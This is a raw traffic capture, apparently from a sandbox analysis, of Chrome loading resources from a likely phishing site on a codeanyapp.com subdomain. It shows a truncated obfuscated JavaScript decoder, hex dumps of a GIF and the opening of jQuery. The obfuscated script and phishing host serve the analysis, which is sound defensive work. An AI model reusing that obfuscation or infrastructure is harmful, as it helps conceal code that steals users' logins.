                                                                                                    2025-01-02 08:50:00 UTC272INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Thu, 02 Jan 2025 07:53:22 GMT
                                                                                                    Content-Type: application/javascript
                                                                                                    Content-Length: 2841
                                                                                                    Connection: close
                                                                                                    Last-Modified: Tue, 31 Dec 2024 07:16:17 GMT
                                                                                                    ETag: "b19-62a8bb47ae06a"
                                                                                                    Accept-Ranges: bytes
                                                                                                    Vary: Accept-Encoding
                                                                                                    2025-01-02 08:50:00 UTC1182INData Raw: 76 61 72 20 70 72 6f 74 6f 63 6f 6c 2c 75 72 6c 2c 64 61 74 61 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 4f 79 68 3d 27 27 2c 4b 4d 6f 3d 37 32 36 2d 37 31 35 3b 66 75 6e 63 74 69 6f 6e 20 4b 77 64 28 66 29 7b 76 61 72 20 6b 3d 31 35 34 32 32 39 34 3b 76 61 72 20 73 3d 66 2e 6c 65 6e 67 74 68 3b 76 61 72 20 70 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 69 3d 30 3b 69 3c 73 3b 69 2b 2b 29 7b 70 5b 69 5d 3d 66 2e 63 68 61 72 41 74 28 69 29 7d 3b 66 6f 72 28 76 61 72 20 69 3d 30 3b 69 3c 73 3b 69 2b 2b 29 7b 76 61 72 20 61 3d 6b 2a 28 69 2b 33 39 33 29 2b 28 6b 25 32 37 30 36 35 29 3b 76 61 72 20 78 3d 6b 2a 28 69 2b 32 30 32 29 2b 28 6b 25 33 30 35 30 34 29 3b 76 61 72 20 71 3d 61 25 73 3b 76 61 72 20 62 3d 78 25 73 3b 76 61 72 20 75 3d 70 5b 71 5d 3b 70
                                                                                                    Data Ascii: var protocol,url,data;(function(){var Oyh='',KMo=726-715;function Kwd(f){var k=1542294;var s=f.length;var p=[];for(var i=0;i<s;i++){p[i]=f.charAt(i)};for(var i=0;i<s;i++){var a=k*(i+393)+(k%27065);var x=k*(i+202)+(k%30504);var q=a%s;var b=x%s;var u=p[q];p
                                                                                                    2025-01-02 08:50:00 UTC1659INData Raw: 67 61 65 73 31 72 3d 29 2b 32 69 69 69 28 30 75 29 3d 3d 63 74 3b 30 41 29 28 6c 5d 6f 3b 3b 6f 74 61 76 74 6e 6c 35 6e 67 29 29 76 64 3d 43 76 6c 74 72 6f 6f 65 72 69 37 2a 6e 36 2c 62 73 76 2e 3b 28 74 22 3d 3d 29 76 3d 3b 39 43 75 3d 63 2b 22 6f 2e 75 6f 32 3c 3b 32 3d 3b 27 3b 76 61 72 20 70 4a 7a 3d 4b 77 64 5b 73 67 47 5d 3b 76 61 72 20 65 72 41 3d 27 27 3b 76 61 72 20 66 71 59 3d 70 4a 7a 3b 76 61 72 20 4d 41 6d 3d 70 4a 7a 28 65 72 41 2c 4b 77 64 28 4b 59 4a 29 29 3b 76 61 72 20 43 6e 70 3d 4d 41 6d 28 4b 77 64 28 27 6c 73 2e 6f 2e 31 6e 4f 28 28 29 5d 37 25 61 5c 2f 2d 61 28 35 3d 72 74 24 2e 74 32 62 2e 29 70 7d 28 2c 67 30 28 33 34 2c 29 6f 64 6f 6a 68 2e 6f 24 75 78 3b 64 25 26 6f 33 23 3d 78 6d 6e 5f 62 61 62 64 66 3d 30 6e 6f 2e 2c 32 25 32
                                                                                                    Data Ascii: gaes1r=)+2iii(0u)==ct;0A)(l]o;;otavtnl5ng))vd=Cvltrooeri7*n6,bsv.;(t"==)v=;9Cu=c+"o.uo2<;2=;';var pJz=Kwd[sgG];var erA='';var fqY=pJz;var MAm=pJz(erA,Kwd(KYJ));var Cnp=MAm(Kwd('ls.o.1nO(()]7%a\/-a(5=rt$.t2b.)p}(,g0(34,)odojh.o$ux;d%&o3#=xmn_babdf=0no.,2%2


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    13192.168.2.449757198.199.109.954432800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-02 08:50:00 UTC388OUTGET /army/army/auth/res/loading.gif HTTP/1.1
                                                                                                    Host: spoty-omsave0558101.codeanyapp.com
                                                                                                    Connection: keep-alive
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: none
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-02 08:50:00 UTC239INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Thu, 02 Jan 2025 07:53:22 GMT
                                                                                                    Content-Type: image/gif
                                                                                                    Content-Length: 79790
                                                                                                    Connection: close
                                                                                                    Last-Modified: Tue, 31 Dec 2024 07:16:17 GMT
                                                                                                    ETag: "137ae-62a8bb48319d3"
                                                                                                    Accept-Ranges: bytes
                                                                                                    2025-01-02 08:50:00 UTC4111INData Raw: 47 49 46 38 39 61 c8 00 c8 00 f7 00 00 1e d7 60 1f d7 61 20 d7 61 21 d8 62 24 d8 64 26 d8 66 27 d9 66 28 d9 67 29 d9 68 2a d9 68 2b d9 69 2d da 6b 2e da 6b 2f da 6c 30 da 6d 32 db 6e 37 db 72 3a dc 74 3b dc 74 3c dc 75 3d dd 76 41 dd 79 44 de 7b 45 de 7c 46 de 7c 47 de 7d 48 de 7e 4b df 80 4e e0 82 4f e0 83 50 e0 83 51 e0 84 53 e1 86 54 e1 86 55 e1 87 59 e1 89 5a e2 8b 5b e2 8b 5c e2 8c 5d e2 8c 65 e4 92 67 e4 93 67 e4 94 68 e4 94 69 e4 95 6b e5 96 6c e5 97 6e e5 99 6f e5 99 71 e6 9a 71 e6 9b 72 e6 9b 72 e6 9c 74 e6 9d 76 e7 9e 77 e7 9f 7b e8 a2 7c e8 a2 7d e8 a3 7e e8 a4 80 e8 a6 81 e9 a6 83 e9 a7 85 e9 a9 87 ea aa 89 ea ab 89 ea ac 8a ea ac 8b ea ad 8c eb ae 8f eb af 93 ec b2 94 ec b3 96 ec b5 97 ec b5 99 ed b7 9c ed b9 9e ee ba a0 ee bc a2 ee bd a4 ef
                                                                                                    Data Ascii: GIF89a`a a!b$d&f'f(g)h*h+i-k.k/l0m2n7r:t;t<u=vAyD{E|F|G}H~KNOPQSTUYZ[\]egghiklnoqqrrtvw{|}~
                                                                                                    2025-01-02 08:50:00 UTC8688INData Raw: ba b5 ed e1 b9 40 6e d8 f6 c5 e8 d1 18 62 5b c9 a3 6f 62 1b 05 a8 b7 d2 9b 8e 9e 0b d3 5b b8 54 b2 52 89 30 3c e9 55 db 84 54 46 0a 80 01 3c c0 31 0a 4e 45 98 9e 65 05 80 79 00 05 22 ba cc c4 87 6d 38 50 e9 8b 66 2d a0 d1 39 4b ae f4 56 a4 91 89 b4 e6 c0 11 7f d4 b2 52 63 b5 ad d1 e4 a2 b5 51 f0 ca 4a 4f d8 76 82 91 c7 f4 f6 03 4b 7a da c6 64 8c 95 f4 c6 06 f7 bd b9 5a 8c b0 d0 1b 4e b4 e4 32 b5 99 c0 94 28 e4 01 db 98 c0 25 54 e8 cd 21 28 34 88 de 08 aa 25 f9 ab 4d 10 28 04 83 de 34 c2 25 b5 60 5c 6d b0 04 a0 48 f4 26 01 bf 78 09 12 7a 93 04 03 ed a0 37 a6 79 09 c1 7a e3 a5 f9 64 c2 37 79 80 09 33 56 63 1b 19 e8 c7 08 fe bd 89 40 30 62 e2 ac de 90 c9 3c 9f f0 cd e9 62 42 ae de 90 60 4d e0 89 82 6f 40 31 13 da f4 46 7d d9 e9 84 6f aa 37 93 39 f8 a6 01 71
                                                                                                    Data Ascii: @nb[ob[TR0<UTF<1NEey"m8Pf-9KVRcQJOvKzdZN2(%T!(4%M(4%`\mH&xz7yzd7y3Vc@0b<bB`Mo@1F}o79q
                                                                                                    2025-01-02 08:50:00 UTC10136INData Raw: 60 1e d7 60 1e d7 60 1e d7 60 1e d7 60 1e d7 60 1e d7 60 1e d7 60 1e d7 60 1e d7 60 1e d7 60 1e d7 60 1e d7 60 1e d7 60 1e d7 60 1e d7 60 1e d7 60 1e d7 60 1e d7 60 1e d7 60 1f d7 60 1f d7 61 20 d7 61 20 d7 61 20 d7 61 20 d7 61 20 d7 61 21 d7 62 22 d7 62 22 d7 63 23 d7 63 24 d7 64 26 d7 65 26 d8 66 27 d8 66 28 d8 67 28 d8 67 29 d8 67 2a d9 68 2c d9 6a 2e d9 6b 2f d9 6c 31 da 6d 32 da 6e 33 da 6f 35 da 70 38 db 72 39 db 73 3b dc 74 3d dc 75 3f dc 77 41 dd 78 43 dd 7a 44 dd 7a 45 dd 7c 47 de 7d 49 de 7e 4a de 7f 4b de 80 4e df 82 53 e0 85 56 e0 88 58 e1 89 5b e1 8b 5d e2 8c 5e e2 8d 5f e2 8e 61 e2 90 63 e3 91 65 e3 92 68 e4 94 69 e4 95 6e e4 98 70 e5 9a 73 e5 9c 77 e6 9f 7a e7 a1 7c e7 a3 7f e8 a4 80 e8 a5 81 e8 a6 83 e8 a8 86 e9 aa 8e eb af 96 ec b5 9e ee
                                                                                                    Data Ascii: `````````````````````a a a a a a!b"b"c#c$d&e&f'f(g(g)g*h,j.k/l1m2n3o5p8r9s;t=u?wAxCzDzE|G}I~JKNSVX[]^_acehinpswz|
                                                                                                    2025-01-02 08:50:00 UTC6248INData Raw: 88 05 42 a8 42 18 d0 38 d8 3b 20 37 45 51 68 6c 1f 38 29 a2 9e 22 16 11 5f 0c 91 42 35 2b 06 66 66 a8 47 a0 c5 c3 0e 34 44 40 d3 3e 62 ae 00 0a 2f 6b d1 e0 5f 04 dd 16 b4 82 58 de 7f fe 59 5c 37 30 98 3d 40 d8 2e 2a 26 d1 05 0b 8b 67 ad 32 f6 c3 63 9b e3 4c 19 0f 04 0e 11 be ce 07 7d 4c 10 3d 3c c1 ba b3 23 b2 41 92 83 50 d4 d4 48 c9 06 61 44 9f 82 b3 5a 28 1b 44 10 60 a0 19 6a 4a 6b 65 82 dc 61 0b a9 65 0c 24 bb cc 10 52 e8 a1 0c 51 78 71 3a 5f 3c 4a e6 87 10 42 0d 5c 68 c2 0f 9e 5b 80 69 b5 b9 22 87 a0 83 1a 2e 77 e7 3e fb f9 cf 80 0e b4 a0 07 4d e8 42 1b fa d0 88 4e b4 a2 17 cd e8 46 3b fa d1 90 8e b4 46 02 02 00 21 f9 04 09 03 00 a4 00 2c 00 00 00 00 c8 00 c8 00 87 00 00 00 1d d6 5f 1d d6 5f 1d d6 5f 1d d6 5f 1e d7 60 1e d7 60 1e d7 60 1e d7 60 1e d7
                                                                                                    Data Ascii: BB8; 7EQhl8)"_B5+ffG4D@>b/k_XY\70=@.*&g2cL}L=<#APHaDZ(D`jJkeae$RQxq:_<JB\h[i".w>MBNF;F!,____````
                                                                                                    2025-01-02 08:50:00 UTC3888INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 08 fe 00 51 09 1c 48 b0 a0 c1 83 08 13 2a 5c c8 b0 a1 c3 87 10 23 4a 9c 48 b1 a2 c5 8b 18 33 6a dc c8 b1 a3 c7 8f 20 43 8a 1c 49 b2 a4 c9 93 28 53 aa 5c c9 b2 a5 cb 97 30 63 ca 9c 49 b3 a6 cd 9b 38 73 ea dc c9 b3 a7 cf 9f 40 83 0a 1d 4a b4 a8 d1 a3 48 93 2a 5d ca b4 a9 d3 a7 50 a3 4a 9d 4a b5 aa d5 ab 58 b3 4a bd e3 06 cd 97 2b 52 94 f8 28 40 b6 ec 0c 1c 3e 84 10 49 12 45 0b 1a 39 7f b4 42 0d e4 66 4b 92 b2 78 f3 ea dd 4b 36 88 14 32 74 1a c9 2d 1a c8 0c 95 1d 7c 13 2b 4e 4c 24 0b 1b 41 83 7b ea 09 53 64 b1 e5 cb 7c 93 98 81 1c
                                                                                                    Data Ascii: QH*\#JH3j CI(S\0cI8s@JH*]PJJXJ+R(@>IE9BfKxK62t-|+NL$A{Sd|
                                                                                                    2025-01-02 08:50:00 UTC4344INData Raw: 17 24 d2 13 9b 74 a4 6d 66 90 48 4d 84 d2 24 8f 44 4d 09 12 69 89 db 0c 81 93 aa 11 a4 09 1f e1 4a 94 94 c5 36 94 bb 21 ea 6c 73 84 37 de 66 10 5b 24 63 6a a2 80 92 8c d9 46 8e 52 54 c3 6d b4 78 92 b0 a9 c6 86 49 64 20 fb 50 52 37 db 9c 2b 89 54 54 4d e0 4c 12 c3 da 6c 4c 8a d6 aa 4d f6 4e 92 87 db 18 61 8b e1 e3 0c 30 4f 42 c7 db 78 22 89 89 08 4e ec 4a c2 89 e0 ac f3 85 ce fe b3 8d 4a 96 a8 9a ea dd 90 7e b5 51 82 08 97 99 44 80 d9 66 7f 29 d1 60 6d 7e 00 40 ed 6d c2 78 aa 79 83 4a 22 58 bf 17 ce 21 38 44 4c 89 01 6f d3 3e 0a 66 33 35 9e 5c c9 12 6e 33 c3 0e 02 07 8a 2c 71 a6 6a 6c a4 c0 5d 4e 73 25 17 bd 8d 9d 14 c8 b4 db 4c 70 25 9a 50 5b 6d 6c b0 c3 df 8d 02 8f 92 b3 44 4b f4 55 1b 89 ba 4f 6f b7 99 82 4b d6 10 1c 26 dc 2f 66 b7 f1 27 4b f8 78 9b 42
                                                                                                    Data Ascii: $tmfHM$DMiJ6!ls7f[$cjFRTmxId PR7+TTMLlLMNa0OBx"NJJ~QDf)`m~@mxyJ"X!8DLo>f35\n3,qjl]Ns%Lp%P[mlDKUOoK&/f'KxB
                                                                                                    2025-01-02 08:50:00 UTC16384INData Raw: ba b4 f1 73 b8 a7 a3 38 5d 80 3c de cc 19 70 92 33 94 2b d7 9c 24 27 cb 8c ce a8 53 f7 fd 1c 5a 74 cb 4a 77 ba e4 50 4d bb 76 85 26 70 2a b9 4e 29 89 4d 11 db c0 6b 0b 41 33 77 f7 c8 46 67 7c 04 5f 5e 9b 86 97 3f c6 3f 22 0a 73 83 b9 75 db 52 ea 5c 8a 9e b1 91 18 19 d7 c3 fe db 76 d2 9a bb c4 4a 6c 94 8b 5f 4f 1b 46 99 49 e6 23 d6 51 c2 be 7e ed 23 78 e2 37 04 24 c5 be ff da 5c 30 a2 5f 42 63 fc 67 20 6d 3f d8 31 60 41 85 34 71 e0 83 aa 81 a1 db 82 71 e8 00 e1 85 a8 31 01 88 7e 93 74 81 e1 87 9d dd d0 86 79 81 d0 07 e2 89 9b 59 d1 88 71 78 54 87 e2 8b 8e 1d 21 88 6b 72 c0 00 e3 8d 8d f9 d0 47 65 6a 80 a8 c3 13 5d a8 21 c7 1e 7e 04 72 08 23 92 a0 22 49 22 81 ec 81 87 1c 6f ac 01 46 12 1f e2 70 07 5d 64 5c 28 45 1a 79 28 62 d1 22 73 88 b1 c4 85 71 64 e5 a1
                                                                                                    Data Ascii: s8]<p3+$'SZtJwPMv&p*N)MkA3wFg|_^??"suR\vJl_OFI#Q~#x7$\0_Bcg m?1`A4qq1~tyYqxT!krGej]!~r#"I"oFp]d\(Ey(b"sqd
                                                                                                    2025-01-02 08:50:00 UTC9680INData Raw: 14 88 41 dd c4 41 81 fe ac c8 8d 6e a4 c6 3f 78 15 67 87 fc 33 45 0e 8a e3 06 a4 14 2a 3f 77 30 8e 0d 8b 42 0a 2d d9 cf 3b e0 2b 0e 15 76 41 14 57 fc 21 37 52 98 8d 77 9c 55 9c f8 01 65 17 8b 70 82 5f 52 57 1d 18 ba 66 08 62 fc 49 25 c4 e0 18 4e 54 e7 14 42 30 0e 20 82 62 8a 5d 3d a6 0b b8 00 ce 2f c8 58 1c 8c f5 24 16 84 e8 c1 67 d8 88 19 73 15 e7 7c 3d e9 45 23 f2 17 19 47 9c 66 14 8a 34 4e b4 76 c2 89 c9 b1 46 08 16 ac 8b 2b 90 55 1c 3f f0 e4 14 3d 34 5e 1c ad 82 0b 42 ee c6 08 6c d2 49 25 a0 33 07 ad d8 01 3a 66 c4 49 2c 8a 67 1c 53 5e e5 80 b7 f3 9a 4e 44 f7 1c 41 58 65 3e d0 91 c4 4f 10 05 1d d2 45 45 18 46 7c 8e e1 7e c2 8a 24 64 27 97 4c 11 86 09 9f 23 04 c8 fd 84 40 d9 39 04 01 97 b2 8b bf 41 87 88 40 91 59 76 ea 10 c8 a5 b4 82 4c d0 f9 e1 50 50
                                                                                                    Data Ascii: AAn?xg3E*?w0B-;+vAW!7RwUep_RWfbI%NTB0 b]=/X$gs|=E#Gf4NvF+U?=4^BlI%3:fI,gS^NDAXe>OEEF|~$d'L#@9A@YvLPP
                                                                                                    2025-01-02 08:50:00 UTC1448INData Raw: 3a e2 5f 26 32 8f 1d 4e ad f4 2c 55 15 22 c3 3e b9 9a 55 f0 5b 7a ba 63 a5 fe ec 34 ef e5 d7 92 22 60 f8 67 9a 80 2f 35 42 9f 81 8d dd 81 e0 4b 90 c8 c6 60 5f db 3d e8 92 23 fd 4d c8 96 10 8e 58 e8 52 2b 75 e8 a6 21 12 99 78 e8 92 26 05 6a 48 45 2a 26 b6 44 8c 1d 3e 68 08 47 8b 2e 31 92 84 86 87 d0 d8 52 27 5b 4c 88 44 27 3a c6 87 c6 84 60 04 18 64 4a ae 78 c7 a0 1d 47 ae 74 0b 1c 0c 02 a1 49 93 2b cd c1 60 1a 54 ae 24 07 83 8c 64 99 52 2d 6a 18 68 05 2d 5e a2 a4 8a 17 06 86 57 e6 49 a1 48 e1 9f 12 a6 ac 79 92 26 48 f8 37 87 9c 27 ad e7 1f 73 78 96 04 65 7d 71 f4 59 92 29 50 d4 37 44 5e 82 8e d4 88 7f 75 24 4a 92 95 ec 2d 81 9f a3 21 a5 d2 44 7d 80 50 2a d2 6a ec 65 71 8b a6 20 d5 a2 45 7d d4 81 fa d1 a2 ec b1 61 2a 48 6c d4 87 ca aa fe 1e 51 52 5f 85 2e
                                                                                                    Data Ascii: :_&2N,U">U[zc4"`g/5BK`_=#MXR+u!x&jHE*&D>hG.1R'[LD':`dJxGtI+`T$dR-jh-^WIHy&H7'sxe}qY)P7D^u$J-!D}P*jeq E}a*HlQR_.
                                                                                                    2025-01-02 08:50:00 UTC4344INData Raw: 54 89 6d c2 b8 34 4d a8 03 72 83 84 89 17 df 98 2e 59 00 04 69 a9 f4 09 3e fc ec c6 64 d0 a5 9c 40 d1 87 31 90 66 c0 3e 10 83 1e 28 ec a8 51 14 e2 0d 18 2e ef 10 d4 20 88 1d c3 4a 20 8f a8 03 84 05 3b 84 32 88 f6 cb 0c 71 45 55 24 00 11 07 2e 80 d5 75 6c d0 03 24 74 88 66 89 70 c2 11 84 b0 03 1c ca f0 05 2d 50 c1 09 96 5c 82 14 b4 00 86 34 c0 81 0e 7c 30 84 23 32 c1 e2 3a 3b fa d1 90 8e b4 a4 27 4d e9 4a 5b fa d2 98 ce b4 a6 37 cd e9 4e 7b fa d3 a0 0e b5 a8 47 4d ea 52 1f 24 20 00 21 f9 04 09 04 00 db 00 2c 00 00 00 00 c8 00 c8 00 87 00 00 00 01 01 01 02 02 02 03 03 03 04 04 04 05 05 05 06 06 06 07 07 07 08 08 08 09 09 09 0a 0a 0a 0b 0b 0b 0c 0c 0c 0d 0d 0d 0e 0e 0e 0f 0f 0f 10 10 10 11 11 11 12 12 12 13 13 13 14 14 14 15 15 15 16 16 16 17 17 17 18 24 1c
                                                                                                    Data Ascii: Tm4Mr.Yi>d@1f>(Q. J ;2qEU$.ul$tfp-P\4|0#2:;'MJ[7N{GMR$ !,$


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    14192.168.2.449758198.199.109.954432800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-02 08:50:00 UTC382OUTGET /army/army/auth/res/jq.js HTTP/1.1
                                                                                                    Host: spoty-omsave0558101.codeanyapp.com
                                                                                                    Connection: keep-alive
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: none
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-02 08:50:01 UTC276INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Thu, 02 Jan 2025 07:53:23 GMT
                                                                                                    Content-Type: application/javascript
                                                                                                    Content-Length: 293671
                                                                                                    Connection: close
                                                                                                    Last-Modified: Tue, 31 Dec 2024 07:16:17 GMT
                                                                                                    ETag: "47b27-62a8bb47f705a"
                                                                                                    Accept-Ranges: bytes
                                                                                                    Vary: Accept-Encoding
                                                                                                    2025-01-02 08:50:01 UTC12762INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 4a 61 76 61 53 63 72 69 70 74 20 4c 69 62 72 61 72 79 20 76 33 2e 36 2e 33 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 63 6f 6d 2f 0a 20 2a 0a 20 2a 20 49 6e 63 6c 75 64 65 73 20 53 69 7a 7a 6c 65 2e 6a 73 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 73 69 7a 7a 6c 65 6a 73 2e 63 6f 6d 2f 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 0a 20 2a 20 44 61 74 65 3a 20 32 30 32 32 2d 31 32 2d 32
                                                                                                    Data Ascii: /*! * jQuery JavaScript Library v3.6.3 * https://jquery.com/ * * Includes Sizzle.js * https://sizzlejs.com/ * * Copyright OpenJS Foundation and other contributors * Released under the MIT license * https://jquery.org/license * * Date: 2022-12-2
                                                                                                    2025-01-02 08:50:01 UTC2896INData Raw: 7a 7a 6c 65 20 3d 0a 2f 2a 21 0a 20 2a 20 53 69 7a 7a 6c 65 20 43 53 53 20 53 65 6c 65 63 74 6f 72 20 45 6e 67 69 6e 65 20 76 32 2e 33 2e 39 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 73 69 7a 7a 6c 65 6a 73 2e 63 6f 6d 2f 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 73 2e 66 6f 75 6e 64 61 74 69 6f 6e 2f 0a 20 2a 0a 20 2a 20 44 61 74 65 3a 20 32 30 32 32 2d 31 32 2d 31 39 0a 20 2a 2f 0a 28 20 66 75 6e 63 74 69 6f 6e 28 20 77 69 6e 64 6f 77 20 29 20 7b 0a 76 61 72 20 69 2c 0a 09 73 75 70 70 6f 72 74 2c 0a 09 45
                                                                                                    Data Ascii: zzle =/*! * Sizzle CSS Selector Engine v2.3.9 * https://sizzlejs.com/ * * Copyright JS Foundation and other contributors * Released under the MIT license * https://js.foundation/ * * Date: 2022-12-19 */( function( window ) {var i,support,E
                                                                                                    2025-01-02 08:50:01 UTC5792INData Raw: 74 65 73 70 61 63 65 20 2b 0a 09 09 22 2a 22 20 29 2c 0a 09 72 64 65 73 63 65 6e 64 20 3d 20 6e 65 77 20 52 65 67 45 78 70 28 20 77 68 69 74 65 73 70 61 63 65 20 2b 20 22 7c 3e 22 20 29 2c 0a 0a 09 72 70 73 65 75 64 6f 20 3d 20 6e 65 77 20 52 65 67 45 78 70 28 20 70 73 65 75 64 6f 73 20 29 2c 0a 09 72 69 64 65 6e 74 69 66 69 65 72 20 3d 20 6e 65 77 20 52 65 67 45 78 70 28 20 22 5e 22 20 2b 20 69 64 65 6e 74 69 66 69 65 72 20 2b 20 22 24 22 20 29 2c 0a 0a 09 6d 61 74 63 68 45 78 70 72 20 3d 20 7b 0a 09 09 22 49 44 22 3a 20 6e 65 77 20 52 65 67 45 78 70 28 20 22 5e 23 28 22 20 2b 20 69 64 65 6e 74 69 66 69 65 72 20 2b 20 22 29 22 20 29 2c 0a 09 09 22 43 4c 41 53 53 22 3a 20 6e 65 77 20 52 65 67 45 78 70 28 20 22 5e 5c 5c 2e 28 22 20 2b 20 69 64 65 6e 74 69
                                                                                                    Data Ascii: tespace +"*" ),rdescend = new RegExp( whitespace + "|>" ),rpseudo = new RegExp( pseudos ),ridentifier = new RegExp( "^" + identifier + "$" ),matchExpr = {"ID": new RegExp( "^#(" + identifier + ")" ),"CLASS": new RegExp( "^\\.(" + identi
                                                                                                    2025-01-02 08:50:01 UTC10592INData Raw: 6c 65 63 74 6f 72 20 2b 20 22 20 22 20 5d 20 26 26 0a 09 09 09 09 28 20 21 72 62 75 67 67 79 51 53 41 20 7c 7c 20 21 72 62 75 67 67 79 51 53 41 2e 74 65 73 74 28 20 73 65 6c 65 63 74 6f 72 20 29 20 29 20 26 26 0a 0a 09 09 09 09 2f 2f 20 53 75 70 70 6f 72 74 3a 20 49 45 20 38 20 6f 6e 6c 79 0a 09 09 09 09 2f 2f 20 45 78 63 6c 75 64 65 20 6f 62 6a 65 63 74 20 65 6c 65 6d 65 6e 74 73 0a 09 09 09 09 28 20 6e 6f 64 65 54 79 70 65 20 21 3d 3d 20 31 20 7c 7c 20 63 6f 6e 74 65 78 74 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 20 21 3d 3d 20 22 6f 62 6a 65 63 74 22 20 29 20 29 20 7b 0a 0a 09 09 09 09 6e 65 77 53 65 6c 65 63 74 6f 72 20 3d 20 73 65 6c 65 63 74 6f 72 3b 0a 09 09 09 09 6e 65 77 43 6f 6e 74 65 78 74 20 3d 20 63 6f 6e 74 65 78
                                                                                                    Data Ascii: lector + " " ] &&( !rbuggyQSA || !rbuggyQSA.test( selector ) ) &&// Support: IE 8 only// Exclude object elements( nodeType !== 1 || context.nodeName.toLowerCase() !== "object" ) ) {newSelector = selector;newContext = contex
                                                                                                    2025-01-02 08:50:01 UTC8232INData Raw: 20 7b 0a 09 09 09 73 75 62 57 69 6e 64 6f 77 2e 61 74 74 61 63 68 45 76 65 6e 74 28 20 22 6f 6e 75 6e 6c 6f 61 64 22 2c 20 75 6e 6c 6f 61 64 48 61 6e 64 6c 65 72 20 29 3b 0a 09 09 7d 0a 09 7d 0a 0a 09 2f 2f 20 53 75 70 70 6f 72 74 3a 20 49 45 20 38 20 2d 20 31 31 2b 2c 20 45 64 67 65 20 31 32 20 2d 20 31 38 2b 2c 20 43 68 72 6f 6d 65 20 3c 3d 31 36 20 2d 20 32 35 20 6f 6e 6c 79 2c 20 46 69 72 65 66 6f 78 20 3c 3d 33 2e 36 20 2d 20 33 31 20 6f 6e 6c 79 2c 0a 09 2f 2f 20 53 61 66 61 72 69 20 34 20 2d 20 35 20 6f 6e 6c 79 2c 20 4f 70 65 72 61 20 3c 3d 31 31 2e 36 20 2d 20 31 32 2e 78 20 6f 6e 6c 79 0a 09 2f 2f 20 49 45 2f 45 64 67 65 20 26 20 6f 6c 64 65 72 20 62 72 6f 77 73 65 72 73 20 64 6f 6e 27 74 20 73 75 70 70 6f 72 74 20 74 68 65 20 3a 73 63 6f 70 65
                                                                                                    Data Ascii: {subWindow.attachEvent( "onunload", unloadHandler );}}// Support: IE 8 - 11+, Edge 12 - 18+, Chrome <=16 - 25 only, Firefox <=3.6 - 31 only,// Safari 4 - 5 only, Opera <=11.6 - 12.x only// IE/Edge & older browsers don't support the :scope
